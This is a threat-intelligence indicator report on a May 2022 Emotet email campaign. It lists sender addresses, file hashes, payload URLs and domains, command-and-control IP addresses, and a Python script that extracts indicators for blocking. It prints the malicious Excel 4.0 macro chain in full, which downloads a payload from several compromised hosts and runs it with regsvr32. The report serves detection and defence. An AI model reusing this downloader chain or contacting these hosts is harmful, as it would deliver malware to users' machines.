2022-05-11 Emotet IOCs
THREAT IDENTIFICATION: EMOTET (E4)
SUBJECTS OBSERVED
All subjects were from previously stolen email threads.
SENDERS OBSERVED
ecorvalan@utejgn.com.ar
info1@wafindonesia.com
kic@kstcci.or.jp
langiscote@digicom.qc.ca
m.nishida@autoyohin-k.jp
mjson@c-rainbow.co.kr
subirbanerjee@plastofab.com
usuki@staff-tokai.com
ZIP FILE HASHES
2021e6dd2e880de3ce6d751313674a76
3c3b3ad5331206975e2f264dd606e9f3
3c8db4088a6fa9f4211fb1e6d8f31ad7
827bbb0bb37d4176d5f8dce351351e4b
XLS FILE HASHES
33dd66bc99b4cd70a0af2917fc9e1f8e
3b66d62ec7f82c44ea03e0f0adc54432
7913ae084f311565b4f6215b206dac47
fbb35bd387fe755245b9d96d38aefd86
5363618c84d13563e414707cd94001e2
869e1f35f35128667d88dce435eaba0b
EXCEL4 MACROS
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://easiercommunications.com/wp-content/w/","..\wurod.ocx",0,0)
=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dulichdichvu.net/libraries/QhtrjCZymLp5EbqOdpKk/","..\wurod.ocx",0,0))
=IF(HRHRE2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.whow.fr/wp-includes/H54Fgj0tG/","..\wurod.ocx",0,0))
=IF(HRHRE3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://genccagdas.com.tr/assets/TTHOm833iNn3BxT/","..\wurod.ocx",0,0))
=IF(HRHRE4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://heaventechnologies.com.pk/apitest/xdeAU0rx26LT9I/","..\wurod.ocx",0,0))
=IF(HRHRE5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://goonboy.com/goonie/bSFz7Av/","..\wurod.ocx",0,0))
=IF(HRHRE6<0, CLOSE(0),)
=EXEC("C:\Windows\System32\regsvr32.exe ..\wurod.ocx")
=RETURN()
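The macro chain above is a fallback loop: each URLDownloadToFileA call is tried only if the previous one failed, the payload is written to a relative path, and regsvr32.exe is used to execute it. The following script is an added triage example, not part of this IOC report, that parses Excel 4.0 macro text in that shape into structured indicators (download URLs, domains, dropped file names, EXEC commands) and flags regsvr32 invocations against a non-absolute path. The SAMPLE_MACRO input is constructed from the formulas listed above; function names are my own.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a subset of the Excel 4.0 macro chain listed in this report.
SAMPLE_MACRO = r'''=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://easiercommunications.com/wp-content/w/","..\wurod.ocx",0,0)
=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dulichdichvu.net/libraries/QhtrjCZymLp5EbqOdpKk/","..\wurod.ocx",0,0))
=IF(HRHRE6<0, CLOSE(0),)
=EXEC("C:\Windows\System32\regsvr32.exe ..\wurod.ocx")
=RETURN()'''

# CALL("dll","function","argtypes",0,"url","destination",...) as used by the downloader formulas.
CALL_RE = re.compile(
    r'CALL\("(?P<dll>[^"]+)","(?P<func>[^"]+)","[^"]*",\s*0,\s*"(?P<url>[^"]+)",\s*"(?P<dest>[^"]+)"'
)
# EXEC("command line")
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')


def extract_iocs(macro_text):
    """Parse Excel 4.0 macro formulas into download URLs, domains, dropped paths and EXEC commands."""
    urls = []
    dests = set()
    commands = []
    for line in macro_text.splitlines():
        m = CALL_RE.search(line)
        # Only URLDownloadToFile{A,W} calls are treated as payload downloads.
        if m and m.group("func").lower().startswith("urldownloadtofile"):
            urls.append(m.group("url"))
            dests.add(m.group("dest"))
        e = EXEC_RE.search(line)
        if e:
            commands.append(e.group("cmd"))
    domains = sorted({urlparse(u).hostname for u in urls})
    return {
        "urls": urls,
        "domains": domains,
        "dropped_files": sorted(dests),
        "exec_commands": commands,
    }


def flag_relative_regsvr32(commands):
    """Return EXEC commands that run regsvr32 with an argument that is not an absolute drive path.

    A relative .ocx path handed to regsvr32 is the loader pattern seen in this campaign
    and is a useful process-creation detection criterion.
    """
    flagged = []
    for cmd in commands:
        parts = cmd.split()
        if parts and parts[0].lower().endswith("regsvr32.exe"):
            if any(not re.match(r"^[A-Za-z]:\\", arg) for arg in parts[1:]):
                flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_MACRO)
    for key, value in result.items():
        print(key, value)
    print("flagged:", flag_relative_regsvr32(result["exec_commands"]))
```

The domain list it produces can be fed straight into a DNS or proxy blocklist, and the EXEC flag corresponds to a process-creation rule for regsvr32.exe whose command line lacks a drive-letter path.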
EMOTET PAYLOAD DOWNLOAD URLS
http://easiercommunications.com/wp-content/w/
http://dulichdichvu.net/libraries/QhtrjCZymLp5EbqOdpKk/
https://www.whow.fr/wp-includes/H54Fgj0tG/
http://genccagdas.com.tr/assets/TTHOm833iNn3BxT/
http://heaventechnologies.com.pk/apitest/xdeAU0rx26LT9I/
http://goonboy.com/goonie/bSFz7Av/
EMOTET PAYLOAD DOWNLOAD DOMAINS
dulichdichvu.net
easiercommunications.com
genccagdas.com.tr
goonboy.com
heaventechnologies.com.pk
whow.fr
EMOTET PAYLOAD FILE HASHES
7c826bf26607d2339e8d1927bc690ec5
7e0fc6acee0f532c3aacf8f8de17b705
9b00913a8bfd37fb3923f7406f989f61
fcd4b694b100e6e09c34cbdb13bcddb1
EMOTET C2s
http://23.239.0.12:443
http://150.95.66.124:8080
http://1.234.21.73:7080
http://216.158.226.206:443
http://119.193.124.41:7080
http://206.189.28.199:8080
http://94.23.45.86:4143
http://189.126.111.200:7080
http://77.81.247.144:8080
http://213.241.20.155:443
http://160.16.142.56:8080
http://129.232.188.93:443
http://45.118.115.99:8080
http://72.15.201.15:8080
http://172.104.251.154:8080
http://209.250.246.206:443
http://58.227.42.236:80
http://151.106.112.196:8080
http://45.235.8.30:8080
http://173.212.193.249:8080
http://27.54.89.58:8080
http://51.91.7.5:8080
http://203.114.109.124:443
http://201.94.166.162:443
http://146.59.226.45:443
http://185.8.212.130:7080
http://102.222.215.74:443
http://45.176.232.124:443
http://46.55.222.11:443
http://103.75.201.2:443
http://82.165.152.127:8080
http://101.50.0.91:8080
http://185.4.135.165:8080
http://110.232.117.186:8080
http://212.24.98.99:8080
http://164.68.99.3:8080
http://159.65.88.10:8080
http://1.234.2.232:8080
http://188.44.20.25:443
http://51.254.140.238:7080
http://5.9.116.246:8080
http://153.126.146.25:7080
http://79.137.35.198:8080
http://107.182.225.142:8080
http://212.237.17.99:8080
http://183.111.227.137:8080
http://103.132.242.26:8080
http://103.70.28.102:8080
http://51.91.76.89:8080
http://158.69.222.101:443
http://185.157.82.211:8080
http://167.172.253.162:8080
http://197.242.150.244:8080
http://196.218.30.83:443
http://209.126.98.206:8080
http://149.56.131.28:8080
http://167.99.115.35:8080
http://91.207.28.33:8080
http://134.122.66.193:8080
http://209.97.163.214:443
http://131.100.24.231:80
http://163.44.196.120:8080
http://103.43.46.182:443